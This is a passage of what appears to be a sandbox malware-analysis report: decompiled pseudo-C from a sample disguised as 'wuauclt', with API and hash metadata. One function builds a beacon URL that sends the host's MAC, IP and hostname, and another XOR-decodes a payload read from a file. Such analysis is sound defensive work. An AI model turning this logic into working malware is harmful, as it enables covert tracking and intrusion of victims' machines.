                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: _free
                                                • String ID: p$'
                                                • API String ID: 269201875-4283622799
                                                • Opcode ID: 63ac0e5c1a4d739fd370fa0959523141b9367eea63bf8aebb731ac832e121377
                                                • Instruction ID: 3560ffc3fa2b26529be3728a6d2c5233362c1a9ce96e947ebec3acd62bfcbafd
                                                • Opcode Fuzzy Hash: 63ac0e5c1a4d739fd370fa0959523141b9367eea63bf8aebb731ac832e121377
                                                • Instruction Fuzzy Hash: 1C118171A213119BE7309F68BC4EB167294B740731F140716EE58CB2E1E3F0C9AA5B86
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 60%
                                                			E00256080(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags) {
                                                				signed int _v8;
                                                				signed int _v16;
                                                				char _v268;
                                                				char _v276;
                                                				char _v524;
                                                				char _v532;
                                                				char _v780;
                                                				char _v788;
                                                				void* __esi;
                                                				signed int _t20;
                                                				void* _t55;
                                                				void* _t58;
                                                				void* _t59;
                                                				signed int _t60;
                                                
                                                				_t62 = (_t60 & 0xfffffff8) - 0x308;
                                                				_t20 =  *0x271004; // 0x80aab37c
                                                				_v8 = _t20 ^ (_t60 & 0xfffffff8) - 0x00000308;
                                                				_t55 = __edx;
                                                				_t58 = __ecx;
                                                				E002596C0(__edx,  &_v268, 0, 0x100);
                                                				E002596C0(_t55,  &_v524, 0, 0x100);
                                                				E002596C0(_t55,  &_v780, 0, 0x100);
                                                				E00255F70( &_v268); // executed
                                                				E00255E20(__ebx,  &_v524, _t55); // executed
                                                				gethostname( &_v780, 0x100); // executed
                                                				_push(_t58);
                                                				_push(0x88888889 * (0x10624dd3 * GetTickCount() >> 0x20 >> 6) >> 0x20 >> 5);
                                                				_push( &_v788);
                                                				_push( &_v532);
                                                				E00253D30(_t55, "/ipc.html?mac=%s&ip=%s&host=%s&tick=%dmin&c=%s",  &_v276);
                                                				_pop(_t59);
                                                				return E00257097(_v16 ^ _t62 + 0x40, _t59);
                                                			}


















                                                APIs
                                                  • Part of subcall function 00255F70: WSAStartup.WS2_32(00000202,?), ref: 00255F96
                                                  • Part of subcall function 00255F70: GetAdaptersInfo.IPHLPAPI(?,?), ref: 00255FBC
                                                  • Part of subcall function 00255E20: WSAStartup.WS2_32(00000202,?), ref: 00255E48
                                                  • Part of subcall function 00255E20: gethostname.WS2_32(?,00000080), ref: 00255E8A
                                                  • Part of subcall function 00255E20: gethostbyname.WS2_32(?), ref: 00255E97
                                                  • Part of subcall function 00255E20: inet_ntoa.WS2_32(?), ref: 00255ED1
                                                • gethostname.WS2_32(?,00000100), ref: 00256104
                                                • GetTickCount.KERNEL32 ref: 0025610B
                                                Strings
                                                • /ipc.html?mac=%s&ip=%s&host=%s&tick=%dmin&c=%s, xrefs: 0025613D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: Startupgethostname$AdaptersCountInfoTickgethostbynameinet_ntoa
                                                • String ID: /ipc.html?mac=%s&ip=%s&host=%s&tick=%dmin&c=%s
                                                • API String ID: 2444469772-17330609
                                                • Opcode ID: 20b4523f46d6c815e0445cec0da85656fee0f89a448fd12e72e9bde796f17c21
                                                • Instruction ID: 088ad97f1aa90b349f9e13c2019a1f15e65447ee2152bfbefe4b88343be0f53e
                                                • Opcode Fuzzy Hash: 20b4523f46d6c815e0445cec0da85656fee0f89a448fd12e72e9bde796f17c21
                                                • Instruction Fuzzy Hash: 2A1198725143446BC625EB14EC4BFDF77EC9B84700F40452AB989C71D1EEB0A658CBDA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00256410(void** __ecx) {
                                                				void* _t5;
                                                				void* _t6;
                                                				void* _t7;
                                                				void** _t12;
                                                
                                                				_t12 = __ecx;
                                                				_t5 =  *__ecx;
                                                				if(_t5 != 0) {
                                                					InternetCloseHandle(_t5); // executed
                                                				}
                                                				_t6 = _t12[1];
                                                				if(_t6 != 0) {
                                                					InternetCloseHandle(_t6);
                                                				}
                                                				_t7 = _t12[2];
                                                				if(_t7 != 0) {
                                                					_t7 = InternetCloseHandle(_t7);
                                                				}
                                                				 *_t12 = 0;
                                                				_t12[1] = 0;
                                                				_t12[2] = 0;
                                                				return _t7;
                                                			}








                                                APIs
                                                • InternetCloseHandle.WININET(00000000), ref: 00256421
                                                • InternetCloseHandle.WININET(00000000), ref: 0025642B
                                                • InternetCloseHandle.WININET(00000000), ref: 00256435
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: CloseHandleInternet
                                                • String ID:
                                                • API String ID: 1081599783-0
                                                • Opcode ID: 0e4c682f97ff1cdb316782061d71fcdb2cd21850f63f4b15db913f74e4b583fe
                                                • Instruction ID: 5b990eb4a6c8d44d37bbe03244a6c06df77e19c2da28e0b6479fd02b0ca86e09
                                                • Opcode Fuzzy Hash: 0e4c682f97ff1cdb316782061d71fcdb2cd21850f63f4b15db913f74e4b583fe
                                                • Instruction Fuzzy Hash: AEE04FB13103028BDB309F2AEC48B13F7ECAF90700F25881EE894D3250DBB4E884CA64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 55%
                                                			E00256610(void* __ebx, CHAR* __ecx, void** __edx, void* __edi, long* _a4) {
                                                				signed int _v12;
                                                				char _v16;
                                                				char _v48;
                                                				intOrPtr _v52;
                                                				char _v84;
                                                				signed int _v88;
                                                				char _v92;
                                                				void* _v96;
                                                				char _v100;
                                                				void* __esi;
                                                				signed int _t26;
                                                				void* _t29;
                                                				void* _t37;
                                                				void** _t49;
                                                				void* _t53;
                                                				long _t61;
                                                				void* _t63;
                                                				intOrPtr _t65;
                                                				long* _t68;
                                                				signed int _t69;
                                                
                                                				_t26 =  *0x271004; // 0x80aab37c
                                                				_v12 = _t26 ^ _t69;
                                                				_t68 = _a4;
                                                				_t49 = __edx;
                                                				_v100 = 0;
                                                				_t61 =  &_v96;
                                                				_v96 = 0;
                                                				_t29 = E00256160(__ecx, _t61,  &_v100); // executed
                                                				if(_t29 == 0) {
                                                					L11:
                                                					return E00257097(_v12 ^ _t69, _t68);
                                                				} else {
                                                					_t65 = _v100;
                                                					if(_t65 >= 0x300000) {
                                                						E002596C0(_t65,  &_v92, 0, 0x2c);
                                                						_t53 = _v96;
                                                						asm("movups xmm1, [edi+ecx-0x2c]");
                                                						asm("movups [ebp-0x58], xmm1");
                                                						asm("movups xmm0, [edi+ecx-0x1c]");
                                                						asm("movd edx, xmm1");
                                                						asm("movups [ebp-0x48], xmm0");
                                                						asm("movq xmm0, [edi+ecx-0xc]");
                                                						asm("movq [ebp-0x38], xmm0");
                                                						_v52 =  *((intOrPtr*)(_t65 + _t53 - 4));
                                                						if(_t61 - 0x300000 > 0x700000 || _t61 >= _t65) {
                                                							_push(_t53);
                                                							goto L10;
                                                						} else {
                                                							 *_t68 = _t61;
                                                							_t37 = LocalAlloc(0x40, _t61); // executed
                                                							 *_t49 = _t37;
                                                							E00267820(_t37, _v96 + _t65 - _t61 - 0x2c,  *_t68);
                                                							asm("xorps xmm0, xmm0");
                                                							_v16 = 0;
                                                							asm("movups [ebp-0x2c], xmm0");
                                                							asm("movups [ebp-0x1c], xmm0");
                                                							E00254560( *_t49,  *_t68, _t65 - _t61 - 0x2c,  &_v48);
                                                							if(E0025D1BF(_t65 - _t61 - 0x2c, _t68,  &_v48,  &_v84) != 0) {
                                                								goto L2;
                                                							} else {
                                                								_t63 = 0;
                                                								if( *_t68 > 0) {
                                                									do {
                                                										 *( *_t49 + _t63) =  *( *_t49 + _t63) ^ _v88;
                                                										_t63 = _t63 + 1;
                                                									} while (_t63 <  *_t68);
                                                								}
                                                								LocalFree(_v96); // executed
                                                								return E00257097(_v12 ^ _t69, _t68);
                                                							}
                                                						}
                                                					} else {
                                                						L2:
                                                						_push(_v96);
                                                						L10:
                                                						LocalFree();
                                                						goto L11;
                                                					}
                                                				}
                                                			}
























                                                APIs
                                                  • Part of subcall function 00256160: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0025617F
                                                  • Part of subcall function 00256160: GetFileSizeEx.KERNEL32(00000000,?,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0025619F
                                                  • Part of subcall function 00256160: LocalAlloc.KERNELBASE(00000040,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002561AE
                                                  • Part of subcall function 00256160: CloseHandle.KERNEL32(00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002561BE
                                                • LocalAlloc.KERNELBASE(00000040), ref: 002566BE
                                                • LocalFree.KERNELBASE(00000000), ref: 00256724
                                                • LocalFree.KERNEL32(00000000), ref: 0025673E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: Local$AllocFileFree$CloseCreateHandleSize
                                                • String ID:
                                                • API String ID: 36350866-0
                                                • Opcode ID: e331e83b90636138098ab7d2ff6a7c39f12ac1a129b5a62b7e1e774f714e8597
                                                • Instruction ID: c705e33ce572543bdbbe195d86ec5c6bf158848cd31fab58bb6fd877ee156ca4
                                                • Opcode Fuzzy Hash: e331e83b90636138098ab7d2ff6a7c39f12ac1a129b5a62b7e1e774f714e8597
                                                • Instruction Fuzzy Hash: 8741D371E1024C9BCF00DFA4D885BEDF7B9EF98305F108229EC056B245EB3065A9CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 84%
                                                			E0025DD4A() {
                                                				signed int _t20;
                                                				signed int _t22;
                                                				long _t23;
                                                				signed int _t25;
                                                				void* _t28;
                                                				signed int _t31;
                                                				void* _t33;
                                                
                                                				_t31 = 0;
                                                				do {
                                                					_t20 = _t31 & 0x0000003f;
                                                					_t33 = _t20 * 0x30 +  *((intOrPtr*)(0x273b90 + (_t31 >> 6) * 4));
                                                					if( *(_t33 + 0x18) == 0xffffffff ||  *(_t33 + 0x18) == 0xfffffffe) {
                                                						 *(_t33 + 0x28) = 0x81;
                                                						_t22 = _t31;
                                                						if(_t22 == 0) {
                                                							_push(0xfffffff6);
                                                						} else {
                                                							if(_t22 == 1) {
                                                								_push(0xfffffff5);
                                                							} else {
                                                								_push(0xfffffff4);
                                                							}
                                                						}
                                                						_pop(_t23);
                                                						_t28 = GetStdHandle(_t23);
                                                						if(_t28 == 0xffffffff || _t28 == 0) {
                                                							_t25 = 0;
                                                						} else {
                                                							_t25 = GetFileType(_t28); // executed
                                                						}
                                                						if(_t25 == 0) {
                                                							 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
                                                							 *(_t33 + 0x18) = 0xfffffffe;
                                                							_t20 =  *0x273940; // 0x0
                                                							if(_t20 != 0) {
                                                								_t20 =  *(_t20 + _t31 * 4);
                                                								 *(_t20 + 0x10) = 0xfffffffe;
                                                							}
                                                						} else {
                                                							_t20 = _t25 & 0x000000ff;
                                                							 *(_t33 + 0x18) = _t28;
                                                							if(_t20 != 2) {
                                                								if(_t20 == 3) {
                                                									 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000008;
                                                								}
                                                							} else {
                                                								 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
                                                							}
                                                						}
                                                					} else {
                                                						 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000080;
                                                					}
                                                					_t31 = _t31 + 1;
                                                				} while (_t31 != 3);
                                                				return _t20;
                                                			}











                                                APIs
                                                • GetStdHandle.KERNEL32(000000F6), ref: 0025DD96
                                                • GetFileType.KERNELBASE(00000000), ref: 0025DDA8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: FileHandleType
                                                • String ID:
                                                • API String ID: 3000768030-0
                                                • Opcode ID: 3180e9163cec526e725ccffeba25a91e665d156f748656259fb18aa91e78cffd
                                                • Instruction ID: 977384c0c86725de34e99a35f24f21ca8d56210c1171e3c4470f04a3a3be1a72
                                                • Opcode Fuzzy Hash: 3180e9163cec526e725ccffeba25a91e665d156f748656259fb18aa91e78cffd
                                                • Instruction Fuzzy Hash: 8511B433126B5346D7304E3D8C8C722BEB4A756336B380719D9BAC61F1C774D8A9D609
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00256CE1(void* __esi) {
                                                				void* _t6;
                                                
                                                				RegCloseKey(__esi); // executed
                                                				return RegCloseKey( *(_t6 - 0x1c));
                                                			}





                                                APIs
                                                • RegCloseKey.ADVAPI32(80000002,00256CC7,?,002593E0,0026F6D8,000000FE,?,00256FDB,Description), ref: 00256CE8
                                                • RegCloseKey.ADVAPI32(002593E0,?,002593E0,0026F6D8,000000FE,?,00256FDB,Description), ref: 00256CED
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: 6d8a57cf1a000f316466e83a9e8bc2337011a3c48e393ba8ad282ad9bfb6c687
                                                • Instruction ID: 1fae779a9b166d53023d3b6028f45edeb1d653589baa8dc719c49f683981b345
                                                • Opcode Fuzzy Hash: 6d8a57cf1a000f316466e83a9e8bc2337011a3c48e393ba8ad282ad9bfb6c687
                                                • Instruction Fuzzy Hash: 36A01230C1403846CF101750FC0454E3E38AF00110301405290102307049601C51DEC0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 37%
                                                			E00254670(intOrPtr* __ecx) {
                                                				void* _t8;
                                                				void* _t11;
                                                				void* _t18;
                                                				intOrPtr* _t19;
                                                
                                                				_t19 = __ecx;
                                                				_t15 =  *((intOrPtr*)( *__ecx + 0xc)) + 0x50;
                                                				_t8 = LocalAlloc(0x40,  *((intOrPtr*)( *__ecx + 0xc)) + 0x50); // executed
                                                				_t20 =  *_t19;
                                                				_t18 = _t8;
                                                				asm("movups xmm0, [esi]");
                                                				_t2 = _t18 + 0x50; // 0x50
                                                				asm("movups [edi], xmm0");
                                                				asm("movups xmm0, [esi+0x10]");
                                                				asm("movups [edi+0x10], xmm0");
                                                				asm("movups xmm0, [esi+0x20]");
                                                				asm("movups [edi+0x20], xmm0");
                                                				asm("movups xmm0, [esi+0x30]");
                                                				asm("movups [edi+0x30], xmm0");
                                                				asm("movups xmm0, [esi+0x40]");
                                                				asm("movups [edi+0x40], xmm0");
                                                				E00267820(_t2,  *((intOrPtr*)( *_t19 + 0x50)),  *((intOrPtr*)( *_t19 + 0xc)));
                                                				_t11 = E002546E0(_t18, _t15,  *((intOrPtr*)(_t20 + 0x54)),  *((intOrPtr*)(_t20 + 0x38))); // executed
                                                				LocalFree(_t18); // executed
                                                				return _t11;
                                                			}








                                                APIs
                                                • LocalAlloc.KERNELBASE(00000040,?,?,00000000,-00000050,00254983), ref: 00254680
                                                  • Part of subcall function 002546E0: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 002546F5
                                                • LocalFree.KERNELBASE(00000000), ref: 002546D2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: Local$AcquireAllocContextCryptFree
                                                • String ID:
                                                • API String ID: 3426805970-0
                                                • Opcode ID: 1839465a256cd49cfba3b0dec0f0f60e743d6198aa0d980f290c96f44a43bb3e
                                                • Instruction ID: 46f87d6e77b0852ab34c8612286f7fb952c82c0189be3b85539b448d55f280e8
                                                • Opcode Fuzzy Hash: 1839465a256cd49cfba3b0dec0f0f60e743d6198aa0d980f290c96f44a43bb3e
                                                • Instruction Fuzzy Hash: 24018031D14B45ABD3114F38DD459A2F3B8FF6D208704A709EAC523912EB71B5E4C750
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 77%
                                                			E002558E0(char* __ebx, char* __ecx, void* __edi, void* __eflags) {
                                                				signed int _v8;
                                                				char _v276;
                                                				char _v280;
                                                				void* __esi;
                                                				signed int _t10;
                                                				void* _t14;
                                                				void* _t16;
                                                				void* _t40;
                                                				signed int _t42;
                                                
                                                				_t29 = __ebx;
                                                				_t10 =  *0x271004; // 0x80aab37c
                                                				_v8 = _t10 ^ _t42;
                                                				_push(0x700);
                                                				_t40 = __ecx;
                                                				_v280 = 0x700;
                                                				_t41 = E0025B87D(__ecx);
                                                				_t14 = E00255A50(__ecx, _t12,  &_v280); // executed
                                                				if(_t14 == 0 || _v280 != 0x380) {
                                                					E0025B878(_t41);
                                                					_t16 = E00255180(_t29, _t40, _t40); // executed
                                                					if(_t16 != 0) {
                                                						goto L6;
                                                					} else {
                                                						return E00257097(_v8 ^ _t42, _t41);
                                                					}
                                                				} else {
                                                					E00267820(_t40, _t41, 0x380);
                                                					E0025B878(_t41);
                                                					E002596C0(_t40,  &_v276, 0, 0x104);
                                                					GetSystemDirectoryA( &_v276, 0x104);
                                                					if(E00254AE0(__ebx, _t40, _t40) != 4) {
                                                						L6:
                                                						return E00257097(_v8 ^ _t42, _t41);
                                                					} else {
                                                						return E00257097(_v8 ^ _t42, _t41);
                                                					}
                                                				}
                                                			}













                                                APIs
                                                  • Part of subcall function 00255A50: RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location,00000000,00020019,00000000), ref: 00255A72
                                                • GetSystemDirectoryA.KERNEL32 ref: 0025598F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: DirectoryOpenSystem
                                                • String ID:
                                                • API String ID: 4120783374-0
                                                • Opcode ID: 2ca7c06a0b8f3a53dbef3ed4f3a9f687531d67726ee36e3a7db335ffab996f31
                                                • Instruction ID: 02c7abd29253fe9f24d03cfa046d33931cc74b437d1fd538ef3e5ccb2a284e69
                                                • Opcode Fuzzy Hash: 2ca7c06a0b8f3a53dbef3ed4f3a9f687531d67726ee36e3a7db335ffab996f31
                                                • Instruction Fuzzy Hash: F21108B2E1011CA7DF14EA247C17BFE33588F41326F0000A5FD0997281DE765E6C8AD6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			E00260827(void* __esi, void* __eflags) {
                                                				intOrPtr _v12;
                                                				void* __ecx;
                                                				char _t16;
                                                				void* _t17;
                                                				void* _t26;
                                                				void* _t28;
                                                				void* _t30;
                                                				char _t31;
                                                				void* _t33;
                                                				intOrPtr* _t35;
                                                
                                                				_push(_t26);
                                                				_push(_t26);
                                                				_t16 = E0025D3BF(_t26, 0x40, 0x30); // executed
                                                				_t31 = _t16;
                                                				_v12 = _t31;
                                                				_t28 = _t30;
                                                				if(_t31 != 0) {
                                                					_t2 = _t31 + 0xc00; // 0xc00
                                                					_t17 = _t2;
                                                					__eflags = _t31 - _t17;
                                                					if(__eflags != 0) {
                                                						_t3 = _t31 + 0x20; // 0x20
                                                						_t35 = _t3;
                                                						_t33 = _t17;
                                                						do {
                                                							_t4 = _t35 - 0x20; // 0x0
                                                							E0025D7A8(_t28, __eflags, _t4, 0xfa0, 0);
                                                							 *(_t35 - 8) =  *(_t35 - 8) | 0xffffffff;
                                                							 *_t35 = 0;
                                                							_t35 = _t35 + 0x30;
                                                							 *((intOrPtr*)(_t35 - 0x2c)) = 0;
                                                							 *((intOrPtr*)(_t35 - 0x28)) = 0xa0a0000;
                                                							 *((char*)(_t35 - 0x24)) = 0xa;
                                                							 *(_t35 - 0x23) =  *(_t35 - 0x23) & 0x000000f8;
                                                							 *((char*)(_t35 - 0x22)) = 0;
                                                							__eflags = _t35 - 0x20 - _t33;
                                                						} while (__eflags != 0);
                                                						_t31 = _v12;
                                                					}
                                                				} else {
                                                					_t31 = 0;
                                                				}
                                                				E0025D2F4(0);
                                                				return _t31;
                                                			}














                                                APIs
                                                  • Part of subcall function 0025D3BF: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0025E994,00000001,00000364,?,0025A9FA,?,?,?,0025A5BB,?), ref: 0025D400
                                                • _free.LIBCMT ref: 00260893
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: AllocateHeap_free
                                                • String ID:
                                                • API String ID: 614378929-0
                                                • Opcode ID: 50237ebf7c64ed73ef4cf21c2022b54eb8c19bc744e8b6cbe714691875a24da1
                                                • Instruction ID: 6ca5d392d107f113d006250f0c97a24a76e3804f701127775020f8637a34ae43
                                                • Opcode Fuzzy Hash: 50237ebf7c64ed73ef4cf21c2022b54eb8c19bc744e8b6cbe714691875a24da1
                                                • Instruction Fuzzy Hash: 540149726103056BE331DF69C88595AFBD9EB85330F25052DE584832C0EB30AC46CBB4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 95%
                                                			E0025D3BF(void* __ecx, signed int _a4, signed int _a8) {
                                                				void* _t8;
                                                				void* _t12;
                                                				signed int _t13;
                                                				void* _t15;
                                                				void* _t16;
                                                				void* _t19;
                                                				signed int _t20;
                                                				long _t21;
                                                
                                                				_t16 = __ecx;
                                                				_t20 = _a4;
                                                				if(_t20 == 0) {
                                                					L2:
                                                					_t21 = _t20 * _a8;
                                                					if(_t21 == 0) {
                                                						_t21 = _t21 + 1;
                                                					}
                                                					while(1) {
                                                						_t8 = RtlAllocateHeap( *0x273f10, 8, _t21); // executed
                                                						if(_t8 != 0) {
                                                							break;
                                                						}
                                                						__eflags = E0025CBAF();
                                                						if(__eflags == 0) {
                                                							L8:
                                                							 *((intOrPtr*)(E0025D495())) = 0xc;
                                                							__eflags = 0;
                                                							return 0;
                                                						}
                                                						_t12 = E0025BEAE(_t15, _t16, _t19, __eflags, _t21);
                                                						_pop(_t16);
                                                						__eflags = _t12;
                                                						if(_t12 == 0) {
                                                							goto L8;
                                                						}
                                                					}
                                                					return _t8;
                                                				}
                                                				_t13 = 0xffffffe0;
                                                				if(_t13 / _t20 < _a8) {
                                                					goto L8;
                                                				}
                                                				goto L2;
                                                			}












                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0025E994,00000001,00000364,?,0025A9FA,?,?,?,0025A5BB,?), ref: 0025D400
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: ee33a79c1fecd092122b195f2db464373a8c3453a2c051987014758f533370fa
                                                • Instruction ID: 67be4e15197c134b6c3bc2a29fc2c07a0071ce265e87bea59ec5aade32ede72b
                                                • Opcode Fuzzy Hash: ee33a79c1fecd092122b195f2db464373a8c3453a2c051987014758f533370fa
                                                • Instruction Fuzzy Hash: D2F0E031530126B7DB316F219C05B5B3B5CDF41763B288051FC14DB080CA70E8294A9A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 65%
                                                			E00262FDE(void* __ebx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
                                                				signed int _v8;
                                                				char _v460;
                                                				signed int _v464;
                                                				void _v468;
                                                				signed int _v472;
                                                				signed int _v932;
                                                				signed int _v936;
                                                				signed int _v1392;
                                                				signed int _v1396;
                                                				signed int _v1400;
                                                				char _v1860;
                                                				signed int _v1864;
                                                				signed int _v1865;
                                                				signed int _v1872;
                                                				signed int _v1876;
                                                				signed int _v1880;
                                                				signed int _v1884;
                                                				signed int _v1888;
                                                				signed int _v1892;
                                                				signed int _v1896;
                                                				intOrPtr _v1900;
                                                				signed int _v1904;
                                                				signed int _v1908;
                                                				signed int _v1912;
                                                				signed int _v1916;
                                                				signed int _v1920;
                                                				signed int _v1924;
                                                				signed int _v1928;
                                                				char _v1936;
                                                				char _v1944;
                                                				char _v2404;
                                                				signed int _v2408;
                                                				signed int _v2436;
                                                				signed int _t724;
                                                				signed int _t734;
                                                				signed int _t735;
                                                				signed int _t746;
                                                				signed int _t751;
                                                				signed int _t752;
                                                				signed int _t758;
                                                				signed int _t764;
                                                				intOrPtr _t766;
                                                				void* _t767;
                                                				signed int _t768;
                                                				signed int _t769;
                                                				signed int _t770;
                                                				signed int _t779;
                                                				signed int _t784;
                                                				signed int _t785;
                                                				signed int _t786;
                                                				signed int _t789;
                                                				signed int _t790;
                                                				signed int _t791;
                                                				signed int _t793;
                                                				signed int _t794;
                                                				signed int _t795;
                                                				signed int _t796;
                                                				signed int _t801;
                                                				signed int _t802;
                                                				signed int _t808;
                                                				signed int _t809;
